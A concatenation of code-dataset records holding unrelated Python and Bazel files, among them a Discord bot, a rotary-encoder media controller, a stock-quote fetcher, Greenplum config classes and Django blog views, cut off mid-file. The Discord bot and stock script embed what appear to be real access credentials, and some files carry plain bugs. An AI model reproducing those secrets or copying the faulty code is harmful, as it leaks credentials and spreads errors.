[],\n tags = [],\n **kwargs):\n \"\"\"A wrapper to insert Drake-specific customizations.\"\"\"\n cc_proto_library(\n name = name,\n srcs = srcs,\n tags = tags + [\"nolint\"],\n **kwargs)\n drake_installed_headers(\n name = name + \".installed_headers\",\n hdrs = [s[:-len(\".proto\")] + \".pb.h\" for s in srcs],\n deps = installed_headers_for_drake_deps(deps),\n tags = [\"nolint\"],\n )\n\ndef drake_py_proto_library(\n name,\n tags = [],\n **kwargs):\n \"\"\"A wrapper to insert Drake-specific customizations.\"\"\"\n py_proto_library(\n name = name,\n tags = tags + [\"nolint\"],\n **kwargs)\n","sub_path":"tools/skylark/drake_proto.bzl","file_name":"drake_proto.bzl","file_ext":"bzl","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205360305","text":"#coding:iso-8859-9 Türkçe\r\n# p_11701.py: for-in-taranabilir(liste, tüple ve dizge), next(iter(taranabilir)) ve taranabilirin Tersten dökümü örneği.\r\n\r\nprint (\"Iterable/tekrarlı liste, tüple ve dizge dökümleri:\\n\", \"-\"*50, sep=\"\")\r\nfor şehir in [\"Ankara\", \"İstanbul\", \"İzmir\", \"Adana\", \"Mersin\"]: print (şehir, end=\", \")\r\nprint()\r\nfor dil in (\"Basic\", \"Fortran\", \"Cobol\", \"PL/I\", \"Pascal\", \"C\", \"Clipper\",\r\n \"Assembler\", \"Java\", \"JavaScript\", \"Python\"): print (dil, end=\", \")\r\nprint()\r\nfor krk in \"Iteration tekrarlanabilir verilerin işlenme süreçleri çok kolaydır.\": print (krk, end=\", \")\r\n#---------------------------------------------------------------------------------------------------\r\n\r\nşehirler = [\"Ankara\", \"İstanbul\", \"İzmir\", \"Adana\", \"Mersin\", \"Eskişehir\"]\r\ntarayıcı = iter (şehirler) # İterable şehirler listesi, \"iter\" hazır fonksiyonuyla tarayıcı nesnesi elemanları oldu...\r\n\r\nprint (\"\\n\\nŞehirler iterator/tarayıcı nesnesi: \", tarayıcı)\r\nprint (\"Next ile iterator/tarayıcı nesne elemanları dökümü: \", end=\"\")\r\nwhile True:\r\n try: print (next (tarayıcı), end=\", \")\r\n except StopIteration: break\r\n#---------------------------------------------------------------------------------------------------\r\n\r\ndef tekrarlanabilirMi (nesne):\r\n try:\r\n iter (nesne)\r\n return True\r\n except TypeError: return False \r\n\r\nprint(\"\\n\")\r\nfor eleman in [34, [4, 5], (4, 5), {\"a\":4}, \"dizge\", 4.5]: # Sayı, liste, tüple, sözlük, dizge, sayı...\r\n print (eleman, \"==>Iterable/tekrarlanabilir tipli mi? \", tekrarlanabilirMi (eleman) )\r\n#---------------------------------------------------------------------------------------------------\r\n\r\nclass Tersten: # Verili tekrarlanabiliri tersten taratır...\r\n def __init__ (self, veri):\r\n self.veri = veri\r\n self.endeks = len (veri)\r\n\r\n def __iter__ (self): return self\r\n\r\n def __next__ (self):\r\n if self.endeks == 0: raise StopIteration\r\n self.endeks = self.endeks - 1\r\n return self.veri [self.endeks]\r\n\r\ndef dök():\r\n i = 0\r\n while True:\r\n try: print (i, \":\", next (terstenTarayıcı), sep=\"\", end=\", \")\r\n except StopIteration: break\r\n i +=1\r\n\r\nterstenTarayıcı = Tersten (şehirler)\r\nprint (\"\\nŞehir liste tarayıcısı tersten dökecek: \", end=\"\"); dök()\r\n\r\nterstenTarayıcı = Tersten (range (1957, 2019+1) )\r\nprint (\"\\n\\nŞimdi de yılları geriye doğru dökecek: \", end=\"\"); dök()\r\n\r\n\r\n\"\"\"Çıktı:\r\n>python p_11701.py\r\nIterable/tekrarlı liste, tüple ve dizge dökümleri:\r\n--------------------------------------------------\r\nAnkara, İstanbul, İzmir, Adana, Mersin,\r\nBasic, Fortran, Cobol, PL/I, Pascal, C, Clipper, Assembler, Java, JavaScript, Python,\r\nI, t, e, r, a, t, i, o, n, , t, e, k, r, a, r, l, a, n, a, b, i, l, i, r, , v, e, r, i, l, e, r, i, n, , i, ş, l, e, n, m, e, , s, ü, r, e, ç, l, e, r, i,\r\n, ç, o, k, , k, o, l, a, y, d, ı, r, .,\r\n\r\nŞehirler iterator/tarayıcı nesnesi: \r\nNext ile iterator/tarayıcı nesne elemanları dökümü: Ankara, İstanbul, İzmir, Adana, Mersin, Eskişehir,\r\n\r\n34 ==>Iterable/tekrarlanabilir tipli mi? False\r\n[4, 5] ==>Iterable/tekrarlanabilir tipli mi? True\r\n(4, 5) ==>Iterable/tekrarlanabilir tipli mi? True\r\n{'a': 4} ==>Iterable/tekrarlanabilir tipli mi? True\r\ndizge ==>Iterable/tekrarlanabilir tipli mi? True\r\n4.5 ==>Iterable/tekrarlanabilir tipli mi? False\r\n\r\nŞehir liste tarayıcısı tersten dökecek: 0:Eskişehir, 1:Mersin, 2:Adana, 3:İzmir, 4:İstanbul, 5:Ankara,\r\n\r\nŞimdi de yılları geriye doğru dökecek: 0:2019, 1:2018, 2:2017, 3:2016, 4:2015, 5:2014,\r\n6:2013, 7:2012, 8:2011, 9:2010, 10:2009, 11:2008, 12:2007, 13:2006, 14:2005,\r\n15:2004, 16:2003, 17:2002, 18:2001, 19:2000, 20:1999, 21:1998, 22:1997, 23:1996,\r\n24:1995, 25:1994, 26:1993, 27:1992, 28:1991, 29:1990, 30:1989, 31:1988, 32:1987,\r\n33:1986, 34:1985, 35:1984, 36:1983, 37:1982, 38:1981, 39:1980, 40:1979, 41:1978,\r\n42:1977, 43:1976, 44:1975, 45:1974, 46:1973, 47:1972, 48:1971, 49:1970, 50:1969,\r\n51:1968, 52:1967, 53:1966, 54:1965, 55:1964, 56:1963, 57:1962, 58:1961,59:1960,\r\n60:1959, 61:1958, 62:1957,\r\n\"\"\"","sub_path":"Bernd Klein (520) ile Python/p_11701.py","file_name":"p_11701.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64223497","text":"import bluetooth\r\nimport threading\r\n\r\nimport BlueRecord\r\nimport BlueDetect\r\n\r\ndef main():\r\n PORT = 1\r\n server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\r\n server_sock.bind(('', PORT))\r\n server_sock.listen(1) # backlog: 接続待ち受け数\r\n \r\n #Detect = BlueDetect.Detecting()\r\n #Record = BlueRecord.Recording()\r\n \r\n #detect = threading.Thread(target=Detect.detect)\r\n #record = threading.Thread(target=Record.record)\r\n \r\n client_sock, client_addrport = server_sock.accept() # blocking until connection\r\n dalive = False\r\n ralive = False\r\n while True: \r\n data = client_sock.recv(1024)\r\n #print(data) # bytes\r\n rec = data.decode('ascii')\r\n if rec == \"d\":\r\n Detect = BlueDetect.Detecting()\r\n detect = threading.Thread(target=Detect.detect)\r\n detect.start()\r\n dalive = True\r\n \r\n if rec == \"r\":\r\n Record = BlueRecord.Recording()\r\n record = threading.Thread(target=Record.record)\r\n record.start()\r\n ralive = True\r\n \r\n if rec == \"s\":\r\n if dalive:\r\n Detect.set_exit()\r\n detect.join()\r\n dalive = False\r\n if ralive:\r\n Record.set_exit()\r\n record.join()\r\n ralive = False\r\n #Detect.set_exit()\r\n ##Record.set_exit()\r\n print(\"stop\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"rfcomm.py","file_name":"rfcomm.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516444035","text":"from cap7.Ex20SqlAlchemy import Person, Address, engine\nfrom sqlalchemy.orm import sessionmaker\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nanakin = Person(name='Anakin Skywalker', age=32)\nobi1 = Person(name='Obi-Wan Kenobi',age=40)\n\nobi1.addresses = [\n Address(email='obi1@example.com'),\n Address(email='wanwan@example.com'),\n]\n\nanakin.addresses.append(Address(email='ani@example.com'))\nanakin.addresses.append(Address(email='evil.dart@example.com'))\nanakin.addresses.append(Address(email='vader@example.com'))\n\n##session.add(anakin)\n##session.add(obi1)\n##session.commit()\n\nobi1 = session.query(Person).filter(\n Person.name.like('Obi%')\n).first()\nprint(obi1, obi1.addresses)\n\nanakin = session.query(Person).filter(\n Person.name == 'Anakin Skywalker'\n).first()\nprint(anakin, anakin.addresses)\n\nanakin_id = anakin.id\ndel anakin\n\ndef display_info():\n #get all addresses first\n addresses = session.query(Address).all()\n\n #display results\n for address in addresses:\n print(f'{address.person.name} <{address.email}>')\n\n print('people: {}, addresses: {}'.format(\n session.query(Person).count(),\n session.query(Address).count()\n ))\n\ndisplay_info()\n\nanakin = session.query(Person).get(anakin_id)\nsession.delete(anakin)\nsession.commit()\n\ndisplay_info()\n","sub_path":"cap7/Ex21SqlAlchemyPersist.py","file_name":"Ex21SqlAlchemyPersist.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189636188","text":"from gpconfig_modules.database_segment_guc import DatabaseSegmentGuc\nfrom gpconfig_modules.file_segment_guc import FileSegmentGuc\nfrom gpconfig_modules.segment_guc import SegmentGuc\n\n\nclass MultiValueGuc(SegmentGuc):\n \"\"\"\n encapsulate various GUC locations within a given segment.\n A segment can include 2 databases: the primary and a mirror.\n The database value is singular, since we strongly expect the values to be the same, given mirroring.\n However, the file values of primary and mirror can be different. \n So we model this MultiValueGuc object to accept 2 file values, and one database value.\n \"\"\"\n def __init__(self, guc1, guc2):\n \"\"\"\n accept 2 gucs in any order. gucs can be any combination of:\n\n * database guc\n * file guc\n - primary\n - mirror\n * existing comparison guc, with or without mirror\n \"\"\"\n self.primary_file_seg_guc = None\n self.mirror_file_seg_guc = None\n self.db_seg_guc = None\n\n if not guc1 or not guc2:\n raise Exception(\"comparison requires two gucs\")\n\n SegmentGuc.__init__(self, [guc1.context, guc1.name])\n if guc1.context != guc2.context:\n raise Exception(\"Not the same context\")\n\n if isinstance(guc1, MultiValueGuc):\n # copy constructor\n self.db_seg_guc = guc1.db_seg_guc\n self.primary_file_seg_guc = guc1.primary_file_seg_guc\n self.mirror_file_seg_guc = guc1.mirror_file_seg_guc\n\n if isinstance(guc2, MultiValueGuc):\n # copy constructor\n self.db_seg_guc = guc2.db_seg_guc\n self.primary_file_seg_guc = guc2.primary_file_seg_guc\n self.mirror_file_seg_guc = guc2.mirror_file_seg\n\n if isinstance(guc1, FileSegmentGuc):\n if self.primary_file_seg_guc:\n if self.primary_file_seg_guc.dbid == guc1.dbid:\n self.primary_file_seg_guc = guc1\n else:\n self.mirror_file_seg_guc = guc1\n else:\n self.primary_file_seg_guc = guc1\n\n if isinstance(guc2, FileSegmentGuc):\n if self.primary_file_seg_guc:\n if self.primary_file_seg_guc.dbid == guc2.dbid:\n self.primary_file_seg_guc = guc2\n else:\n self.mirror_file_seg_guc = guc2\n else:\n self.primary_file_seg_guc = guc2\n\n if isinstance(guc1, DatabaseSegmentGuc):\n self.db_seg_guc = guc1\n\n if isinstance(guc2, DatabaseSegmentGuc):\n self.db_seg_guc = guc2\n\n def report_success_format(self):\n file_val = self.primary_file_seg_guc.get_value()\n if self.db_seg_guc:\n result = \"%s value: %s | file: %s\" % (self.get_label(), self.db_seg_guc.value, self._use_dash_when_none(file_val))\n else:\n result = \"%s value: %s\" % (self.get_label(), file_val)\n return result\n\n def report_fail_format(self):\n sort_seg_guc_objs = [obj for obj in [self.primary_file_seg_guc, self.mirror_file_seg_guc] if obj]\n sort_seg_guc_objs.sort(key=lambda x: x.dbid)\n\n if self.db_seg_guc:\n report = [self._report_fail_format_with_database_and_file_gucs(seg_guc_obj) for seg_guc_obj in sort_seg_guc_objs]\n else:\n report = [seg_guc_obj.report_fail_format()[0] for seg_guc_obj in sort_seg_guc_objs]\n return report\n\n def _report_fail_format_with_database_and_file_gucs(self, segment_guc_obj):\n return \"[context: %s] [dbid: %s] [name: %s] [value: %s | file: %s]\" % (\n self.db_seg_guc.context,\n segment_guc_obj.dbid,\n self.db_seg_guc.name,\n self.db_seg_guc.value,\n self._use_dash_when_none(segment_guc_obj.value))\n\n def _use_dash_when_none(self, value):\n return value if value is not None else \"-\"\n\n\n def is_internally_consistent(self):\n if not self.db_seg_guc:\n return self.compare_primary_and_mirror_files()\n else:\n if self.primary_file_seg_guc is None:\n return True\n if self.primary_file_seg_guc.get_value() is None:\n return True\n result = True\n if self.mirror_file_seg_guc and self.db_seg_guc:\n result = self.mirror_file_seg_guc.value == self.db_seg_guc.value\n if not result:\n return result\n return self.db_seg_guc.value == self.primary_file_seg_guc.value and result\n\n def get_value(self):\n file_value = \"\"\n if self.primary_file_seg_guc:\n file_value = str(self.primary_file_seg_guc.get_value())\n db_value = \"\"\n if self.db_seg_guc:\n db_value = str(self.db_seg_guc.get_value())\n\n return db_value + \"||\" + file_value\n\n def set_mirror_file_segment(self, mirror_file_seg):\n self.mirror_file_seg_guc = mirror_file_seg\n\n def get_primary_dbid(self):\n return self.primary_file_seg_guc.dbid\n\n def set_primary_file_segment(self, guc):\n self.primary_file_seg_guc = guc\n\n def compare_primary_and_mirror_files(self):\n if self.primary_file_seg_guc and self.mirror_file_seg_guc:\n return self.primary_file_seg_guc.get_value() == self.mirror_file_seg_guc.get_value()\n return True\n","sub_path":"gpMgmt/bin/gpconfig_modules/compare_segment_guc.py","file_name":"compare_segment_guc.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"118444380","text":"# calcultates camera view from bounding boc\n\nimport math\n\n# ewwork of\n# scene size is [[x1,y1,z1],[x2,y2,z2]\ndef placed(scene_size, fudge=1.4, fov=30.0, rescale=1000.0):\n # camera location & target\n cnt = centroid(scene_size, rescale)\n cam_t = cnt # [0,0,cnt[2]]\n # calculate fov distance\n distance = -fudge * (sphere(scene_size) / math.sin(fov / (2 * math.pi)))\n # rotate the point but angles\n cam_p = rot(distance / rescale, 45, 45)\n # offset by target move\n cam_p[0] = cam_p[0] + cam_t[0]\n cam_p[1] = cam_p[1] + cam_t[1]\n cam_p[2] = cam_p[2] + cam_t[2]\n # write\n data = {}\n xzy = lambda a: (a[0], a[2], a[1]) # x,z,y coordinates (not x,y,z)\n data[\"camera_target\"] = \",\".join(\"%g\" % (val) for val in xzy(cam_t))\n data[\"camera_pos\"] = \",\".join(\"%g\" % (val) for val in xzy(cam_p))\n # weird threejs cooreds\n # cam_p[1] = -cam_p[1]\n data[\"cam\"] = xyz(cam_p)\n data[\"target\"] = xyz(cam_t)\n data[\"distance\"] = distance\n data[\"sphere\"] = sphere(scene_size)\n return data\n\n\ndef xyz(pos):\n return {\"x\": pos[0], \"y\": pos[1], \"z\": pos[2]}\n\n\ndef centroid(scene_size, rescale):\n x = (scene_size[1][0] + scene_size[0][0]) / 2.0\n y = (scene_size[1][1] + scene_size[0][2]) / 2.0\n z = (scene_size[1][2] + scene_size[0][2]) / 2.0\n return [x / rescale, y / rescale, z / rescale]\n\n\n# calculate the bounding sphere\ndef sphere(scene_size):\n c = centroid(scene_size, 1)\n smin = scene_size[0]\n smax = scene_size[1]\n val = 2 * max(\n [\n hypot(c[0], smin[0]),\n hypot(c[1], smin[1]),\n hypot(c[2], smin[2]),\n hypot(c[0], smax[0]),\n hypot(c[1], smax[1]),\n hypot(c[2], smax[2]),\n ]\n )\n return val\n\n\ndef hypot(a, b):\n c = math.sqrt((a * a) + (b * b))\n return c\n\n\n# rotate point around the origin\ndef rot(d, alpha, beta):\n a = alpha / (2 * math.pi)\n b = beta / (2 * math.pi)\n x = d * math.cos(a) * math.cos(b)\n y = d * math.cos(a) * math.sin(b)\n z = d * math.sin(a)\n return [x, y, z]\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"315253051","text":"#!/usr/bin/python3\n# Advanced Rotary Control\n#\n# The idea is to replace all input buttons with just one KY-040.\n#\n# Rotate: Increase/Decrease volume\n# Rotate while pressing: Next/Previous track\n# Short press (without rotating): Pause/Play\n# Long press (5s, without rotating): Shutdown\n#\n# Connect as follows:\n#\n# | KY-040 | RPi |\n# |========|========|\n# | CLK | GPIO 5 |\n# | DT | GPIO 6 |\n# | SW | GPIO 3 |\n# | + | 3.3V |\n# | GND | GND |\n#\n\nimport pigpio\nimport time\nimport signal\nfrom subprocess import check_call\n\n\ndef trigger_held(signal, frame):\n check_call(\"./scripts/playout_controls.sh -c=shutdown\", shell=True)\n\n\ndef check_rotation(gpio, level, tick):\n global encoder_rotate_time, encLevA, encLevB, lastEncPin\n if level > 1:\n return\n if gpio == encPinA:\n encLevA = level\n else:\n encLevB = level\n if gpio == lastEncPin: # debounce\n return\n lastEncPin = gpio\n signal.alarm(0)\n encoder_rotate_time = time.time()\n pressed = not bool(pi.read(3))\n if gpio == encPinA and level == 1:\n if encLevB == 1:\n if pressed:\n check_call(\"mpg123 ./misc/sounds/BubblePo-Benjamin-8920_hifi.mp3\", shell=True)\n check_call(\"./scripts/playout_controls.sh -c=playernext\", shell=True)\n else:\n check_call(\"./scripts/playout_controls.sh -c=volumeup\", shell=True)\n elif gpio == encPinB and level == 1:\n if encLevA == 1:\n if pressed:\n check_call(\"mpg123 ./misc/sounds/Pop-J_Fairba-8421_hifi.mp3\", shell=True)\n check_call(\"./scripts/playout_controls.sh -c=playerprev\", shell=True)\n else:\n check_call(\"./scripts/playout_controls.sh -c=volumedown\", shell=True)\n\n\ndef trigger_released(gpio, level, tick):\n global trigger_press_time, encoder_rotate_time\n signal.alarm(0)\n if encoder_rotate_time < trigger_press_time:\n check_call(\"./scripts/playout_controls.sh -c=playerpause\", shell=True)\n\n\ndef trigger_pressed(gpio, level, tick):\n global trigger_press_time\n trigger_press_time = time.time()\n signal.alarm(5)\n\n\ndef exit_handler(signal, frame):\n exit(0)\n\n\nsignal.signal(signal.SIGINT, exit_handler)\nsignal.signal(signal.SIGTERM, exit_handler)\nsignal.signal(signal.SIGALRM, trigger_held)\n\nencoder_rotate_time = trigger_press_time = time.time()\n\npi = pigpio.pi()\n\nencPinA = 5\nencPinB = 6\n\nif pi.get_mode(encPinA) != pigpio.INPUT:\n pi.set_mode(encPinA, pigpio.INPUT)\n pi.set_pull_up_down(encPinA, pigpio.PUD_UP)\n pi.set_glitch_filter(encPinA, 30)\n\nif pi.get_mode(encPinB) != pigpio.INPUT:\n pi.set_mode(encPinB, pigpio.INPUT)\n pi.set_pull_up_down(encPinB, pigpio.PUD_UP)\n pi.set_glitch_filter(encPinB, 30)\n\nif pi.get_mode(3) != pigpio.INPUT:\n pi.set_mode(3, pigpio.INPUT)\n pi.set_pull_up_down(3, pigpio.PUD_UP)\n pi.set_glitch_filter(3, 300)\n\nencLevA = pi.read(encPinA)\nencLevB = pi.read(encPinB)\nlastEncPin = None\n\npi.callback(3, pigpio.FALLING_EDGE, trigger_pressed)\npi.callback(3, pigpio.RISING_EDGE, trigger_released)\npi.callback(5, pigpio.EITHER_EDGE, check_rotation)\npi.callback(6, pigpio.EITHER_EDGE, check_rotation)\n\nwhile True:\n signal.pause()\n","sub_path":"scripts/advanced-rotary-control.py","file_name":"advanced-rotary-control.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307633833","text":"import discord\r\nimport os\r\nfrom discord.ext import commands, tasks\r\nfrom itertools import cycle\r\n\r\n\r\ntoken = 'NjE2MjY2NjY1Njc5NzgxOTA4.XYZjRA.e9xPeTdEo9GQvL2xgoSPSCaZ79s'\r\nstatus = cycle(['Under development','Hosted by Dirt Master#3923','Developed by: Aidas#0666'])\r\nallowed = ['joins', 'leaves']\r\n\r\nclient = commands.Bot(command_prefix = '-')\r\n\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint('Alpaca has been launched!')\r\n\tchange_status.start()\r\n\r\n@client.event\r\nasync def on_guild_join(guild):\r\n os.mkdir('logs\\guilds\\{0}-{1}'.format(guild.name,guild.id))\r\n print('I have been invited to {0} ({1})'.format(guild.name,guild.id))\r\n await guild.system_channel.send('Thanks for inviting me to your server! I promise i will do my best to make ur server awesome! :heart:')\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n print(f\"{member} has joined a guild\")\r\n f = open('logs\\guilds\\{0}-{1}\\joinlogs.txt'.format(member.guild.name,member.guild.id), 'a')\r\n f.write('A user ({0}) joined {1} ({2})\\n'.format(member,member.guild.name,member.guild.id))\r\n f.close()\r\n\r\n@client.event\r\nasync def on_member_remove(member):\r\n print(f\"{member} has been removed/kicked from the guild\")\r\n f = open('logs\\guilds\\{0}-{1}\\leavelogs.txt'.format(member.guild.name,member.guild.id), 'a')\r\n f.write('A user ({0}) has been kicked/removed from \\n Guild_name: {1} \\n Guild_ID: {2}\\n'.format(member.guild.id,member.guild.name,member.guild.id))\r\n f.close()\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n\tawait ctx.send(f':ping_pong: **Pong!**\\n My current ping is: {client.latency * 1000}ms!')\r\n\t\r\n@client.command()\r\nasync def setup(ctx):\r\n\tawait ctx.send(f'OK, creating the roles & etc... !')\r\n\r\n@client.command()\r\nasync def showlogs(ctx):\r\n\tawait ctx.send(f'What logs you want to see:\\n-``Join``\\n-``Leave``')\r\nasync def getAnswer(message,allowed):\r\n try:\r\n def pred(m):\r\n return m.author == message.author and m.channel == message.channel\r\n msg = await BOT.wait_for('message', check=pred, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n return False\r\n else:\r\n\r\n if msg.content.lower().strip() in allowed:\r\n\r\n\r\n return msg\r\n else:\r\n\r\n return await getAnswer(message,allowed)\r\n\r\n@tasks.loop(seconds=10)\r\nasync def change_status():\r\n\tawait client.change_presence(activity=discord.Game(next(status)))\r\n\r\nclient.run(token)\r\n\r\n","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225499919","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom classy_vision.generic.opts import check_generic_args, parse_train_arguments\nfrom classy_vision.generic.util import load_json\n\n\ntry:\n import hydra\n\n hydra_available = True\nexcept ImportError:\n hydra_available = False\n\nargs = None\nconfig = None\n\n\nif hydra_available:\n\n @hydra.main(config_path=\"../hydra/args.yaml\")\n def _parse_hydra_args(cfg):\n # This need to be a separate function which sets globals because hydra doesn't\n # support returning from its main function\n global args, config\n args = cfg\n check_generic_args(args)\n config = args.config.to_container()\n\n\ndef parse_args():\n \"\"\"Parse arguments.\n\n Parses the args from argparse. If hydra is installed, uses hydra based args\n (experimental).\n \"\"\"\n if hydra_available:\n global args, config\n _parse_hydra_args()\n return args, config\n else:\n args = parse_train_arguments()\n config = load_json(args.config_file)\n return args, config\n","sub_path":"classy_vision/generic/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47818943","text":"import urllib.request\nimport json\n\ndef getStockData(symbol):\n apiKey = \"N2IG8Q9WK1JZZ7U9\"\n url = \"https://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol={0}&apikey={1}\".format(symbol, apiKey)\n connection = urllib.request.urlopen(url)\n responseString = connection.read().decode()\n data = json.loads(responseString)\n print(data['Global Quote']['05. price'])\n return data['Global Quote']['05. price']\n\ndef __main__():\n fileContents = []\n while (True):\n answer = input(\"Enter a stock symbol or enter quit to quit:\\n\")\n if (answer.lower() == \"quit\"):\n break\n fileContents.append(\"The current price of \" + answer + \" is: \" + getStockData(answer))\n for contentLine in fileContents:\n f = open(\"japi.out\", \"a\")\n f.write(contentLine + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n __main__();\n","sub_path":"japi.py","file_name":"japi.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447139141","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nexp_data = np.random.exponential(1, 1000000)\nsum_n = 0\nsum_n_2 = 0\npat_nums = []\npat_times = []\nlast_n = 0\nn = 0\nwhile n < 100000:\n sum_n = sum_n + exp_data[n]\n if sum_n >= 100:\n pat_nums.append(n-last_n)\n last_n = n\n sum_n = 0\n\n sum_n_2 = sum_n_2+exp_data[n]\n if n % 10 == 0:\n pat_times.append(sum_n_2)\n sum_n_2 = 0\n\n n += 1\n#print(\"Pat num:\", pat_nums)\n#print(\"Pat time:\", pat_times)\n\nplt.hist(pat_nums, bins=\"auto\", normed=True, label=\"Pat numbers\")\nplt.hist(pat_times, bins=\"auto\", normed=True, label=\"Pat times\")\nplt.xlabel(\"Occurance within 100 timesteps\")\nplt.ylabel(\"Probability\")\nplt.legend()\n\n\nplt.show()\n","sub_path":"Multi-hospital/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"553183393","text":"from django.views.generic import UpdateView, DetailView, ListView, CreateView, DeleteView\nfrom django.http import request, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom . models import Contact, District, Feedback, Post,Comment\nfrom django.contrib import messages\nfrom . forms import ContactForm, CreatePostForm\nfrom django.urls import reverse_lazy\nfrom django.db.models import Q\nfrom .templatetags import tag\n\n# Create your views here.\n\n\ndef search(request):\n query = request.POST.get('search', ' ')\n if query:\n queryset = (Q(title__icontains=query)) | (Q(category__icontains=query)) | (Q(subject__icontains=query)) | (\n Q(class_in__name__icontains=query)) | (Q(salary__icontains=query))\n results = Post.objects.filter(queryset).distinct()\n else:\n results = []\n context = {\n 'results': results\n }\n return render(request, 'blog/search.html', context)\n\n\ndef home(request):\n return render(request, 'blog/home.html')\n\ndef about_us(request):\n return render(request, 'blog/about_us.html')\n\n\ndef feedback(request):\n if request.method == \"POST\":\n name = request.POST['name']\n phone = request.POST['phone']\n email = request.POST['email']\n complain = request.POST['complain']\n obj = Feedback(name=name, phone=phone, email=email, complain=complain)\n obj.save()\n messages.success(request, 'Feedback submit successfully.')\n return redirect('/')\n return render(request, 'blog/feedback.html')\n\n\ndef contact(request):\n if request.method == \"POST\":\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Contact request submit successfully.')\n return redirect('/')\n\n else:\n form = ContactForm()\n return render(request, 'blog/contact.html', {'form': form})\n\n\n# class PostCreateView(CreateView):\n# model = Post\n# form_class = CreatePostForm\n# template_name = 'blog/createpost.html'\n# # success_url = '/'\n\n# def form_valid(self, form):\n# form.instance.user = self.request.user\n# messages.success(self.request, 'Post created successfully.')\n# return super().form_valid(form)\n\n# def get_success_url(self):\n# id = self.object.id\n# return reverse_lazy('postlist')\n\n\ndef createpost(request):\n if request.method == \"POST\":\n form = CreatePostForm(request.POST,request.FILES)\n if form.is_valid():\n obj=form.save(commit=False)\n obj.user=request.user\n obj.save()\n dis=form.cleaned_data['district']\n if not District.objects.filter(name=dis).exists():\n disobj=District(name=dis)\n disobj.save()\n class_in=form.cleaned_data['class_in']\n for i in class_in:\n obj.class_in.add(i)\n obj.save()\n messages.success(request, 'Post create successfully.')\n return redirect('postlist')\n else:\n form=CreatePostForm(district_set=District.objects.all().order_by('name'))\n return render(request, 'blog/createpost.html', {'form': form})\n\n\nclass PostListView(ListView):\n queryset = Post.objects.all()\n template_name = 'blog/postview.html'\n context_object_name = 'post'\n\n\n# def postlist(request):\n# post = Post.objects.all()\n# return render(request,'blog/postview.html',{'post':post})\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog/postdetail.html'\n def get_context_data(self,*args, **kwargs):\n self.object.views.add(self.request.user)\n\n liked=False\n if self.object.likes.filter(id=self.request.user.id).exists():\n liked=True\n context= super().get_context_data(*args,**kwargs)\n post=context.get('object')\n comments = Comment.objects.filter(post=post.id, parent=None)\n replies = Comment.objects.filter(post=post.id).exclude(parent=None)\n DictofReply={}\n for reply in replies:\n if reply.parent.id not in DictofReply.keys():\n DictofReply[reply.parent.id]=[reply]\n else:\n DictofReply[reply.parent.id].append(reply)\n context['liked']= liked\n context['comments'] = comments\n context['DictofReply'] = DictofReply\n return context\n\nfrom notifications.signals import notify\ndef likepost(request,id):\n if request.method==\"POST\":\n post=Post.objects.get(id=id)\n if post.likes.filter(id=request.user.id).exists():\n post.likes.remove(request.user)\n else:\n post.likes.add(request.user)\n if request.user != post.user:\n notify.send(request.user, recipient=post.user, verb=\"has liked your post\" + f''' Go ''')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef notification(request):\n return render(request, 'userprofile/notification.html')\n\n\ndef addcomment(request):\n if request.method==\"POST\":\n comment=request.POST['comment']\n parentid = request.POST['parentid']\n postid = request.POST['postid']\n post=Post.objects.get(id=postid)\n if parentid:\n parent=Comment.objects.get(id=parentid)\n newcom=Comment(text=comment,user=request.user,post=post,parent=parent)\n newcom.save()\n else:\n newcom = Comment(text=comment, user=request.user,post=post)\n newcom.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef deletecomment(request,id):\n comment=Comment.objects.get(id=id)\n comment.delete()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\nclass PostEditView(UpdateView):\n model = Post\n form_class = CreatePostForm\n template_name = 'blog/createpost.html'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n messages.success(self.request, 'Post Edited Successfully')\n return 